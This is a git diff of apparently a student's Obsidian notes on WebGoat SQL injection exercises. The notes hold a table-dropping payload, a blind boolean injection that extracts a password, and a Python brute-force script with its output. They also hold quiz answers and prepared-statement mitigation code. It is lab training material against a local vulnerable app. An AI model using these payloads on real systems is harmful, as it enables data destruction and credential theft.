diff --git a/.obsidian/workspace.json b/.obsidian/workspace.json index 255ce5f..3816e14 100644 --- a/.obsidian/workspace.json +++ b/.obsidian/workspace.json @@ -6,7 +6,7 @@ { "id": "08ad9b53ade42d31", "type": "tabs", - "dimension": 45.31147540983606, + "dimension": 62.59025270758123, "children": [ { "id": "e2194e3299515374", @@ -25,7 +25,7 @@ { "id": "47553fa673bb1eb6", "type": "tabs", - "dimension": 54.68852459016394, + "dimension": 37.40974729241877, "children": [ { "id": "20668ba691cd80b3", @@ -202,8 +202,9 @@ "juggl:Juggl global graph": false } }, - "active": "e2194e3299515374", + "active": "b8336cb3c3d06be9", "lastOpenFiles": [ + "Informationssicherheit/Ueb2/2023-04-17_14-16.png", "Untitled 1.md", "Untitled.md", "Informationssicherheit/Ueb2/Ueb2.md", diff --git a/Informationssicherheit/Ueb2/2023-04-17_14-16.png b/Informationssicherheit/Ueb2/2023-04-17_14-16.png new file mode 100644 index 0000000..faca2b0 Binary files /dev/null and b/Informationssicherheit/Ueb2/2023-04-17_14-16.png differ diff --git a/Informationssicherheit/Ueb2/Ueb2.md b/Informationssicherheit/Ueb2/Ueb2.md index 21ab38e..b52dd26 100644 --- a/Informationssicherheit/Ueb2/Ueb2.md +++ b/Informationssicherheit/Ueb2/Ueb2.md @@ -97,6 +97,8 @@ Smith'; DROP TABLE access_log; -- ### 2 - `tom' AND '1'='1` is vergeben + - Es gibt eine if-Abfrage, ob der Name vergeben ist + - Man kann diese mit AND beeinflussen - `tom' AND substring(password,1,1)='t` kann buchstaben des Passworts herrausfinden - "Username taken" bedeutet, dass der Buchstabe richig ist - Durch testen: thisisasecretfortomonly @@ -112,7 +114,7 @@ def sql_injection_advance_5(): password = '' headers = { - 'Cookie': COOKIE, + 'Cookie': 'JSESSIONID=8f8OmDA8QEB8JwmEJtPbWkvVtAM_2AerEHJoWYFT', } while True: @@ -125,7 +127,7 @@ def sql_injection_advance_5(): 'confirm_password_reg': 'a' } - r = requests.put('http://HOST:PORT/WebGoat/SqlInjectionAdvanced/challenge', headers=headers, data=data) + r = requests.put('http://127.0.0.1:8080/WebGoat/SqlInjectionAdvanced/challenge', headers=headers, data=data) try: response = json.loads(r.text) @@ -144,7 +146,71 @@ def sql_injection_advance_5(): password_index += 1 sql_injection_advance_5() + ``` +Output: +t +th +thi +this +thisi +thisis +thisisa +thisisas +thisisase +thisisasec +thisisasecr +thisisasecre +thisisasecret +thisisasecretf +thisisasecretfo +thisisasecretfor +thisisasecretfort +thisisasecretforto +thisisasecretfortom +thisisasecretfortomo +thisisasecretfortomon +thisisasecretfortomonl +thisisasecretfortomonly + +### 3 +1. What is the difference between a prepared statement and a statement? + - Solution 4: A statement has got values instead of a prepared statement +2. Which one of the following characters is a placeholder for variables? + - Solution 3: ? +3. How can prepared statements be faster than statements? + - Solution 2: Prepared statements are compiled once by the database management system waiting for input and are pre-compiled this way. +4. How can a prepared statement prevent SQL-Injection? + - Solution 3: Placeholders can prevent that the users input gets attached to the SQL query resulting in a seperation of code and data. +5. What happens if a person with malicious intent writes into a register form :Robert); DROP TABLE Students;-- that has a prepared statement? + - Solution 4: The database registers 'Robert' ); DROP TABLE Students;--'. + +## Mitigation + +### 1 +- getConnection +- PreparedStatement +- prepareStatement +- ? +- ? +- setString +- setString + +![[2023-04-17_14-16.png]] + +### 2 +``` java +try { + Connection conn = DriverManager.getConnection(DBURL, DBUSER, DBPW); + PreparedStatement ps = conn.prepareStatement("SELECT * FROM users WHERE name = ?"); + ps.setString(1, "Admin"); + ps.executeUpdate(); +} catch (Exception e) { + System.out.println("Oops. Something went wrong!"); +} +``` + +### 3